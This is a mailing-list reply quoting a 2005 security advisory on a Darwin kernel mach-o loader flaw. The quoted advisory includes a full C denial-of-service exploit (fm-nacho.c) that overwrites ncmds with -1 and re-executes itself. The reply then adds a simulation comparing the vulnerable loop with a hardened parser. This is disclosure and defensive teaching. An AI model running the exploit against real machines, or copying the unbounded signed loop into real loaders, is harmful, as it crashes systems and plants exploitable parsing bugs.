
Re: Darwin Kernel Vulnerability



On Wed, Jan 19, 2005 at 11:53:15AM -0800, nemo@xxxxxxxxxxxxxxxx wrote:
> "moderator: resending this mail since it appears to have been dropped; if not,
> please ignore this message.
> 
>                      _,'|             _.-''``-...___..--';)
>                      /_ \'.      __..-' ,      ,--...--'''
>                     <\    .`--'''       `     /'
>                     `-';'               ;   ; ;
>                __...--''     ___...--_..'  .;.'
>            fL (,__....----'''       (,..--''  felinemenace.org
> 
>> Program:     Darwin Kernel 7.1
> Affects <= Darwin Kernel 7.7.0
> Sorry about the rushed advisory.
> - nemo
> Impact:               DoS, Possible local privilege escalation.       
> Discovered:   8th January 2005 by nemo -( nemo @ felinemenace.org )-
> Writeup and exploits:
> 
> 1) Background
> 
> Numerous bugs exist in the Darwin Kernel used by Mac OSX 10.3.
> Some of the bugs we investigated exist due to lack of input validation in the
> mach-o loader.
> 
> 2) Description
> 
> In the file bsd/kern/mach_loader.c the mach-o header is parsed and for the
> most part each field is trusted to be acceptable.
> 
> In the mach-o loader code (parse_machfile()) ncmds and offset are both
> declared as signed integers, however the appropriate structs used to read
> from the file are unsigned.
> After a little investigation a DoS was quickly written to set ncmds to -1.
> 
>       ncmds = header->ncmds;
>       while (ncmds--) {
> 
> The attached code will cause a denial of service on MacOSX <= 10.3.7
> 
> 3) Notes
> During our audit of the Darwin Kernel many bugs stood out, however we have not
> had time to follow through on most of them. Something that caught our attention
> was the misuse of the copyinstr() command. This function will not force a NULL
> character to be appended to the string copied in, however it seems in many cases
> the size passed to the function doesn't take this into account.
> Unfortunately, as security goes, it's all about who posts first.
> http://www.immunitysec.com/downloads/nukido.pdf
> 
> 4) Vendor status/notes/fixes/statements
> Apple have been notified about this bug.
> 
> 5) Exploit
> 
> //---------------------( fm-nacho.c )--------------------------
> /*
>  * DoS for Darwin Kernel Version < 7.5.0
>  * -(nemo@xxxxxxxxxxxxxxx)-
>  * 2005
>  *
>  * greetz to awnex, cryp, nt, andrewg, arc, mercy, amnesia ;)
>  * irc.pulltheplug.org (#social)
>  */
> 
> #include <stdio.h>
> #include <stdlib.h>     /* exit() */
> #include <unistd.h>     /* sleep(), execv() */
> 
> /*
>  * Overwrites the ncmds field (file offset 0x10) of this program's own
>  * mach-o header with 0xffffffff, then re-executes the file so the
>  * kernel loader parses the modified header.
>  */
> int main(int ac, char **av)
> {
>         FILE *me;
>         int rpl = 0xffffffff;   /* new ncmds value: -1 once read as a signed int */
>         fpos_t pos = 0x10;      /* offset of ncmds in the mach_header */
>         printf("-( nacho - 2004 DoS for OSX (darwin < 7.5.0 )-\n");
>         printf("-( nemo@xxxxxxxxxxxxxxx )-\n\n");
>         printf("[+] Opening file for writing.\n");
>         if(!(me = fopen(*av,"r+"))) {   /* av[0]: this binary itself */
>                 printf("[-] Error opening exe.\n");
>                 exit(1);
>         }
>         printf("[+] Seeking to ncmds.\n");
>         if((fsetpos(me,&pos)) == -1) {
>                 printf("[-] Error seeking to ncmds.\n");
>                 exit(1);
>         }
>         printf("[+] Changing ncmds to 0x%x.\n",rpl);
>         if(fwrite(&rpl,4,1,me) < 1) {
>                 printf("[-] Error writing to file.\n");
>                 exit(1);
>         }
>         fclose(me);
>         printf("[+] Re-executing with modified mach-o header.\n");
>         sleep(5);
>         if(execv(*av,av) == -1 ) {
>                 printf("[-] Error executing %s, please run manually.\n",*av);
>                 exit(1);
>         }
>         exit(0); // hrm
> }
> 
>
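The ncmds handling described in section 2 of the advisory, as an added example that is not code from the advisory or from the Darwin source tree: a constructed 32-bit mach-o image is walked first by a loop that copies the `while (ncmds--)` pattern with a signed counter taken from the unsigned header field, then by a version that keeps ncmds unsigned and bounds it by sizeofcmds and by each command's cmdsize. The struct declarations, the two-command test image, the parse_result codes and the PARSE_OVERRUN stop (which stands in for the kernel fault, since the real loop has no such check) are my own; the field offset 0x10 written by set_ncmds is the one fm-nacho.c seeks to.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* 32-bit mach-o header and load command, field order as in <mach-o/loader.h>,
 * declared locally so the example builds on any host. ncmds is unsigned in
 * the file format, which is the mismatch the advisory points at. */
struct mach_header {
    uint32_t magic, cputype, cpusubtype, filetype;
    uint32_t ncmds;        /* file offset 0x10: the field fm-nacho.c overwrites */
    uint32_t sizeofcmds;   /* total size of all load commands */
    uint32_t flags;
};
struct load_command {
    uint32_t cmd, cmdsize;
};
#define MH_MAGIC   0xfeedface
#define LC_SEGMENT 0x1

enum parse_result { PARSE_OK, PARSE_BAD_HEADER, PARSE_BAD_NCMDS,
                    PARSE_BAD_CMDSIZE, PARSE_OVERRUN };

/* Vulnerable pattern: the unsigned ncmds lands in a signed int and drives the
 * loop with no bound against the command area. With ncmds = 0xffffffff the
 * loop runs about four billion times, reading "load commands" well past the
 * header. The kernel loop has no stop; this simulation returns PARSE_OVERRUN
 * at the end of the buffer where the kernel would fault. */
enum parse_result parse_vuln(const uint8_t *buf, size_t len, int *visited)
{
    struct mach_header h;
    struct load_command lc;
    memcpy(&h, buf, sizeof h);
    int ncmds = (int)h.ncmds;           /* 0xffffffff becomes -1 */
    size_t offset = sizeof h;
    *visited = 0;
    while (ncmds--) {                   /* -1 is true: never stops on its own */
        if (offset + sizeof lc > len)
            return PARSE_OVERRUN;       /* stand-in for the panic */
        memcpy(&lc, buf + offset, sizeof lc);
        offset += lc.cmdsize;
        (*visited)++;
    }
    return PARSE_OK;
}

/* Hardened version: keep ncmds unsigned, bound it by sizeofcmds (each command
 * is at least sizeof(struct load_command) bytes), and check every cmdsize
 * before advancing so the walk cannot leave the command area. */
enum parse_result parse_hardened(const uint8_t *buf, size_t len, int *visited)
{
    struct mach_header h;
    struct load_command lc;
    *visited = 0;
    if (len < sizeof h)
        return PARSE_BAD_HEADER;
    memcpy(&h, buf, sizeof h);
    if (h.magic != MH_MAGIC || h.sizeofcmds > len - sizeof h)
        return PARSE_BAD_HEADER;
    if (h.ncmds > h.sizeofcmds / sizeof lc)
        return PARSE_BAD_NCMDS;         /* more commands than could fit */
    size_t offset = sizeof h, end = sizeof h + h.sizeofcmds;
    for (uint32_t i = 0; i < h.ncmds; i++) {
        if (end - offset < sizeof lc)
            return PARSE_BAD_CMDSIZE;
        memcpy(&lc, buf + offset, sizeof lc);
        if (lc.cmdsize < sizeof lc || lc.cmdsize > end - offset)
            return PARSE_BAD_CMDSIZE;   /* also rejects cmdsize 0 */
        offset += lc.cmdsize;
        (*visited)++;
    }
    return PARSE_OK;
}

/* Constructed test image: header plus two 16-byte commands tagged LC_SEGMENT
 * (tag only, no segment body). Returns the image length, 60 bytes. */
size_t build_image(uint8_t *buf, uint32_t ncmds)
{
    struct mach_header h = { MH_MAGIC, 0, 0, 0, ncmds, 2 * 16, 0 };
    struct load_command lc = { LC_SEGMENT, 16 };
    size_t off = sizeof h;
    memcpy(buf, &h, sizeof h);
    for (int i = 0; i < 2; i++) {
        memset(buf + off, 0, 16);
        memcpy(buf + off, &lc, sizeof lc);
        off += 16;
    }
    return off;
}

/* The same edit fm-nacho.c makes on disk: write a new ncmds at offset 0x10. */
void set_ncmds(uint8_t *buf, uint32_t value)
{
    memcpy(buf + offsetof(struct mach_header, ncmds), &value, sizeof value);
}

int main(void)
{
    uint8_t img[64];
    int visited;
    size_t len = build_image(img, 2);
    printf("clean:    vuln=%d hardened=%d\n",
           parse_vuln(img, len, &visited), parse_hardened(img, len, &visited));
    set_ncmds(img, 0xffffffff);         /* what fm-nacho.c does to the binary */
    enum parse_result r = parse_vuln(img, len, &visited);
    printf("ncmds=-1: vuln=%d after %d commands, hardened=%d\n",
           r, visited, parse_hardened(img, len, &visited));
    return 0;
}
```

The hardened walk rejects the exploit's header before touching a single load command, and the per-command cmdsize check catches the case the ncmds bound lets through (a count that fits in sizeofcmds but exceeds the commands actually present).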